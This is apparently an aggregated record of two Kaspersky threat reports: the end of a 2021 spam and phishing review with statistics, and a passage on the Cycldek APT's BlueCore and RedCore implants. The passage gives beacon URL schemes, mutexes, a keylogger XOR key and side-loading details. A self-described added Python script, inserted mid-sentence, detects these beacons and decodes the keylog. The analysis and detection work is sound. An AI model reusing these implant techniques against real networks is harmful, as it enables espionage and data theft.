That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. 
The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result". 
Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt" were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. 
If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. 
The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nAs in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), which also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as in 2020, Japan (2.36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. 
In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same number of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which creates malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. 
Eighth place was taken by another exploited vulnerability in Equation Editor, [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%), whose share was just 0.01 p.p. higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. 
In total, 8.20% of Kaspersky users in different countries and regions around the world faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in fourth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were Réunion (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nRéunion | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nAs in 2020, most of the phishing websites blocked in 2021 used a .com domain name; its share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. Third place went to the Chinese country-code domain .cn (7.14%). 
The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. 
The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. 
We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year's main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. 
Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. 
This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated with the group were found in the network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, which was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks were witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**_Figure 1: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. 
CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. 
Notable characteristics of each cluster's implant are summarized in the table below.

| | **BlueCore** | **RedCore** |
---|---|---
Initial infection vector | RTF documents | Unknown
Legitimate AV utility | QcConsol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application)
Side-loaded DLL | QcLite.dll | wsc.dll
Payload loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm - contains PE loading shellcode and an encrypted RedCore binary
Injected process | dllhst3g.exe | explorer.exe or winlogon.exe
Configuration file | %APPDATA%\desktop.ini | C:\Documents and Settings\All Users\Documents\desktop.ini or C:\Documents and Settings\All Users\Documents\desktopWOW64.ini
Mutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214}
Communicated URL scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s

_Table 1: Comparison of BlueCore and RedCore loader and implant traits._

As demonstrated by the table, the variants share similar behavior. For example, both use DLL load-order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities, and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution.
By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and show identical code that may have been written by a shared developer.

_Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>))_

Moreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implant's raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open-source project, we estimate that they originate from a proprietary shared resource.

_Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>))_

Having said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:

 * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes every 10 ms to an internal buffer of size 65530. When this buffer is filled, its contents are written to a file named 'RCoRes64.dat'. The data is encoded using a single-byte XOR with the key 0xFA.
 * _Device enumerator_: RedCore registers a window class intended to intercept window messages, with a callback that checks whether the inspected message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume and, if it is, sends a bitmap of the currently available logical drives to the C&C.
 * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>), which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware contacts the C&C and informs it about the connection event.
 * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed to it from a source are validated and passed on to the C&C in their original format.

Perhaps the most notable difference between the two implants is the URL scheme they use to connect to and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure between the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code.
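The two beacon URL schemes in Table 1 and the RedCore keylog encoding are artifacts a defender can check for directly. The following Python is an added example written for this page, not code from the report or from Kaspersky: it classifies proxy or EDR log records by the BlueCore and RedCore URL schemes and decodes a RedCore keystroke log (XOR with the single byte 0xFA), with a key-recovery step for variants that might change the key. The log record format, the hostnames (.test placeholders) and the keylog bytes are all constructed; the real C&C domains are listed in the Appendix.

```python
"""Triage helpers for the BlueCore/RedCore artifacts described above.

Added example, not code from the report. Part 1 classifies log records by the
two C&C URL schemes from Table 1; part 2 decodes a RedCore keystroke log
('RCoRes64.dat', single-byte XOR with 0xFA). All sample data is constructed.
"""
from string import ascii_letters, digits
from urllib.parse import parse_qsl, urlsplit

# Beacon URL schemes from Table 1: request path plus the exact parameter order
# produced by each implant's format string.
BEACON_SCHEMES = {
    ("/link", ("url", "enpl", "encd")): "BlueCore",
    ("/search.jsp", ("referer", "kw", "psid")): "RedCore",
    ("/search.jsp", ("url", "referer", "kw", "psid")): "RedCore",
}


def classify_beacon(url):
    """Return 'BlueCore', 'RedCore' or None for a single request URL."""
    parts = urlsplit(url)
    keys = tuple(k for k, _ in parse_qsl(parts.query, keep_blank_values=True))
    return BEACON_SCHEMES.get((parts.path, keys))


def scan_proxy_log(lines):
    """Scan 'timestamp host process url' records (constructed format) and
    return (host, process, cluster) for every record that matches a scheme."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # malformed record: skip it rather than abort the scan
        _timestamp, host, process, url = fields
        cluster = classify_beacon(url)
        if cluster:
            hits.append((host, process, cluster))
    return hits


XOR_KEY = 0xFA  # RedCore keylog key, as stated in the report
TEXT_BYTES = set((ascii_letters + digits + " \r\n").encode("ascii"))


def xor_bytes(data, key):
    """Single-byte XOR is its own inverse, so this both encodes and decodes."""
    return bytes(b ^ key for b in data)


def recover_xor_key(data):
    """Try all 256 keys and keep the one yielding the most text-like bytes.
    Handy if a variant changes the key; for the sample below it returns 0xFA."""
    return max(range(256), key=lambda k: sum((b ^ k) in TEXT_BYTES for b in data))


def decode_keylog(data, key=XOR_KEY):
    """Decode a keylog buffer; undecodable bytes stay visible as escapes."""
    return xor_bytes(data, key).decode("ascii", errors="backslashreplace")


# Constructed log records. Hostnames are .test placeholders; the real C&C
# domains observed by the report are listed in its Appendix.
SAMPLE_LOG = [
    "2019-03-04T08:12:01Z WS-0142 dllhst3g.exe http://cdn.blue-placeholder.test:8080/link?url=aGVsbG8&enpl=dGVzdA&encd=MQ",
    "2019-03-04T08:12:05Z WS-0142 chrome.exe http://www.example.test/search.jsp?q=weather",
    "2019-03-04T08:13:40Z WS-0077 explorer.exe http://news.red-placeholder.test:88/search.jsp?referer=YWJj&kw=ZGVm&psid=MTIz",
    "2019-03-04T08:14:02Z WS-0077 winlogon.exe http://news.red-placeholder.test:443/search.jsp?url=eA&referer=eQ&kw=eg&psid=MQ",
    "2019-03-04T08:15:00Z WS-0099 outlook.exe http://mail.example.test/owa/?ae=Item",
]

# Constructed keylog: plain text a RedCore buffer might hold, encoded with the key.
SAMPLE_KEYLOG_PLAINTEXT = ("[Document1 - Word]\r\nQuarterly budget is attached\r\n"
                           "[Inbox - Outlook]\r\nmeeting at ten\r\n")
SAMPLE_KEYLOG_ENCODED = xor_bytes(SAMPLE_KEYLOG_PLAINTEXT.encode("ascii"), XOR_KEY)

if __name__ == "__main__":
    for host, process, cluster in scan_proxy_log(SAMPLE_LOG):
        print(f"{host}: {process} beaconed using the {cluster} URL scheme")
    key = recover_xor_key(SAMPLE_KEYLOG_ENCODED)
    print(f"recovered XOR key: 0x{key:02X}")
    print(decode_keylog(SAMPLE_KEYLOG_ENCODED, key))
```

Matching on the exact parameter sequence rather than on individual names matters here: a /search.jsp path with a kw parameter is common on legitimate sites, while the fixed referer/kw/psid order is specific to the implant's format string. The key-recovery scoring simply counts letters, digits, spaces and line breaks after trying all 256 keys; it works because a keylog is mostly natural-language text, and it lets the same decoder handle a variant with a different key.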
All of the discovered domains were used to download further samples.

_Figure 4: Difference in URL scheme used by each implant for C2 communication ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>))_

The conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.

_Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>), [download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>))_

